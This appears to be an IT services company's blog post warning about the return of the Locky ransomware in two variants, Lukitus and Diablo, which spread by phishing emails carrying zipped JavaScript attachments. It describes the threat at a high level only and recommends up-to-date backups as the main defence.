One of the most successful ransomware families, Locky, has returned from the dead with two new variants, ‘Lukitus’ and ‘Diablo’.  The Locky family of ransomware is a type of computer malware that spreads primarily though the distribution of email attachments.  Locky is unique in ransomware in that, since its first appearance in 2016, it has gone dormant many times only to reemerge each time, stronger and more dangerous than before.

The latest version of Locky reactivated on August 9th and has been circulating through the Necurs botnet.  The Necurs botnet itself is one of the largest botnets in the world and uses as many as 6 million endpoints to deliver malware to computers everywhere in the world.  Locky had been dormant on the Necurs botnet since May, but researchers speculate that its reemergence might have to do with the release of recent decryption tools.  Kaspersky Lab released a free decryption kit for the more popular Jaff variant of ransomware, back in July.  With its main ransomware rendered impotent, it is believed that the botnet criminals have chosen to fall back on older forms of malware.

All of that is not to say that Locky is less dangerous, quite the opposite in fact.  The Locky family of ransomware has returned time and again specifically because it is both resilient to decryption and frequently updated.  The two new variants, Diablo and Lukitus, are no different and have been seen hitting computers running Windows XP, Windows 7, and Windows 10 in countries across the world.  So far, the US and EU appear to have been hit the hardest but unique cases have shown up in Asia, South America and even Africa.

As with most ransomware, the new variants of Locky spread through malware spam campaigns in which phishing emails are sent with attachments containing malicious payloads.  This time around, the delivery method of choice seems to be a .zip file packed with JavaScript.  If a user attempts to open the attachment, the file will activate and encrypt all files on the user’s computer.  Once this has occurred, a user will be prompted to download and install a Tor Browser in order to visit a specialized web link and pay a ransom.

Currently, there are no decryption tools available that are capable of salvaging files encrypted with Locky.  While antivirus software has gotten better at detecting ransomware such as Locky, we would like to stress that the best defense is an up-to-date and secure backup solution.   Online cloud services and offsite external storage solutions can provide your business with fast recovery options if your business does have the misfortune to become infected.

If your business encounters this ransomware and needs assistance, or would like help setting up a secure backup plan, contact us and we will work with you to develop a solution.